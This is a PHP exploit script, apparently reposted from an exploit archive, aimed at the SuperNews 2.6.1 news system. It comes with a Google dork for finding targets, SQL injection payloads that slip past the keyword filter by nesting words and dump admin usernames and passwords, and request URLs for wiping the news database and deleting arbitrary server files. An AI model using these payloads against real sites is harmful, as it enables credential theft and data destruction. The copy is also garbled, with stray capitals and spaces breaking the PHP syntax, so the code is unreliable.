<? Php
# Exploit Title: Supernews <= 2.6.1 SQL Injection Exploit
# Google Dork: intext: "2003-2004: SuperNews: Todos OS direitos reservados"
# Date: 2012/
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
# Version: 2.6.1
# Tested on: Debian GNU/Linux
/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail odnanrefsetnop@bol.com.br
SuperNews are a warning Ilian news system in PHP and MySQL.
Versions priors to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug removing keywords like "union" and "select ".
But, with a recursion, it's possible to bypass this filters. See:
Seselectlect
After removing "select" word, will stay another "select" word. See more:
SeSELECTlect
Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL for delete all news on the database.
Another vulnerability allows to delete files, on the administration panel:
When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
But it's possible to delete others files, typing all the file path or using "../".
Usage:
Php exploit. php http://target.com/supernews/
For more info about vulnerabilities:
Php exploit. php moreinfo
Example:
$ Php exploit. php http://target.com/news/
Supernews <= 2.6.1 SQL Injection Exploit
Coded by WhiteCollarGroup-www.wcgroup.host56.com
Use at your own risk.
[*] Trying to access server...
[*] Detecting version...:-o
[!] Version:> 2.6.1 :-)
[!] Administration panel: http://target.com/news/admin/adm_noticias.php
[I] Type "exploit. php moreinfo" for get others vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1
User: user2
Pass: pass2
Good luck! :-D
*/
Error_reporting (E_ERROR );
Set_time_limit (0 );
@ Ini_set ("default_socket_timeout", 30 );
Function hex ($ string ){
$ Hex = ''; // PHP 'dim' =]
For ($ I = 0; $ I <strlen ($ string); $ I ++ ){
$ Hex. = dechex (ord ($ string [$ I]);
}
Return '0x '. $ hex;
}
Function str_replace_every_other ($ needle, $ replace, $ haystack, $ count = null, $ replace_first = true ){
$ Count = 0;
$ Offset = strpos ($ haystack, $ needle );
// If we don't replace the first, go ahead and skip it
If (! $ Replace_first ){
$ Offset + = strlen ($ needle );
$ Offset = strpos ($ haystack, $ needle, $ offset );
}
While ($ offset! = False ){
$ Haystack = substr_replace ($ haystack, $ replace, $ offset, strlen ($ needle ));
$ Count ++;
$ Offset + = strlen ($ replace );
$ Offset = strpos ($ haystack, $ needle, $ offset );
If ($ offset! = False ){
$ Offset + = strlen ($ needle );
$ Offset = strpos ($ haystack, $ needle, $ offset );
}
}
Return $ haystack;
}
Function removeaddregex ($ str ){
Return str_replace_every_other ('(. *)', '', $ str, null, false );
}
Function preg_quote_working ($ str ){
$ Chars = explode ("", "\. + *? [^] $ () {}=! <> | :");
Foreach ($ chars as $ char ){
$ Str = str_replace ($ char, "\". $ char, $ str );
}
Return $ str;
}
Echo "\ nSupernews <= 2.6.1 SQL Injection Exploit ";
Echo "\ nCoded by WhiteCollarGroup-www.wcgroup.host56.com \ nUse at your own risk. \ n ";
If ($ argc! = 2 ){
Echo "Usage:
Php $ argv [0] url
Example:
Http://target.com/supernews php $ argv [0]
Php $ argv [0] https://target.com/supernews ";
Exit;
}
If ($ argv [1] = "moreinfo "){
Echo "\ nMore vulnerabilities:
-Deleting files
You can delete files on the server, after login, using the URL:
Http://www.bkjia.com/admin/adm_noticias.php? Deleta = ID & unlink = FILE
Replace \ "ID \" with a valid post ID (will be deleted) and FILE with the file address on the server.
-Deleting all news on the database:
You can delete all news on the database with one request, only. Look:
Http://server.com/admin/adm_noticias.php? Deleta = 0% 20or % 201 = 1 -- +
All vulnerabilities discovered by WCGroup. \ n ";
Exit;
}
$ Uri = $ argv [1];
If (substr ($ uri,-1, 1 )! = "/"){
$ Uri. = "/";
}
$ Url = $ uri. "noticias. php? Noticia = ". urlencode ("-1 ")." + ";
Echo "\ n [*] Trying to access server ...";
$ Accessvr = @ file_get_contents ($ url );
If ($ accessvr = false) OR (preg_match ("/(404 | mysql_query)/", $ accessvr ))){
$ Url = $ uri. "index. php? Noticia = ". urlencode ("-1 ")." + ";
}
$ Token = substr (md5 (chr (rand (48,122), 0, 10 );
Echo "\ n [*] Detecting version...:-o ";
$ Gettoken = strip_tags (file_get_contents ($ url. urlencode ("union all select 1, 2, 3, 4,". hex ($ token). ", 6, 7 --")));
If (preg_match ("/". $ token. "/", $ gettoken )){
Echo "\ n [!] Version:> 2.6.1 :-)";
$ Version = 1;
} Else {
$ Gettoken = strip_tags (file_get_contents ($ url. urlencode ("uniunionon seleselectct, 5,". hex ($ token --")));
If (preg_match ("/". $ token. "/", $ gettoken )){
Echo "\ n [!] Version = 2.6.1 :-)";
$ Version = 2;
} Else {
Echo "\ n [-] Unknown version:-S ";
$ Version = 3;
}
}
If ($ version! = 3 ){
Echo "\ n [!] Administration panel: {$ uri} admin/adm_noticias.php ";
Echo "\ n [I] Type \" $ argv [0] moreinfo \ "for get others vulnerabilities .";
Echo "\ n [*] Getting user & pass 8-]";
}
If ($ version = 1 ){
$ I = 0;
While (true ){
$ Request = strip_tags (file_get_contents ($ url. urlencode ("union all select 1, 2, 3, 4, concat (". hex ($ token ). ", user ,". hex ($ token ). ", pass ,". hex ($ token ). "), 6, 7 from supernews_login limit $ I, 1 --")));
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ request, $ get );
If ($ get [1] [0]! = ""){
$ User = $ get [1] [0];
$ Pass = $ get [2] [0];
Echo "\ nUser: $ user \ nPass: $ pass \ n ";
$ I ++;
} Else {
Echo "\ nGood luck! :-D ";
Break;
}
}
}
Elseif ($ version = 2 ){
$ I = 0;
While (true ){
$ Request = strip_tags (file_get_contents ($ url. urlencode ("uniunionon seleselectct 1, 2, 3, 4, 5, concat (". hex ($ token ). ", user ,". hex ($ token ). ", pass ,". hex ($ token ). "), 7,8 from supernews_login limit $ I, 1 --")));
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ request, $ get );
If ($ get [1] [0]! = ""){
$ User = $ get [1] [0];
$ Pass = $ get [2] [0];
Echo "\ nUser: $ user \ nPass: $ pass \ n ";
$ I ++;
} Else {
Echo "\ nGood luck! :-D ";
Break;
}
}
}
Else {
Echo "\ n \ nThis site are using an unknown version of Supernews or another CMS .";
Echo "\ nPlease note that only versions <= 2.6.1 of Supernews are vulnerable .";
Echo "\ nWebservers with modules or firewalllike \" mod_security \ "aren't vulnerables .";
Echo "\ nIf you want, try to access manually :";
Echo "\ nThe vulnerability are on view notice file (index. php or noticia. php), in variable \" noticia \ ", a simple SQL Injection .";
Echo "\ nWe're sorry .";
}
Echo "\ n ";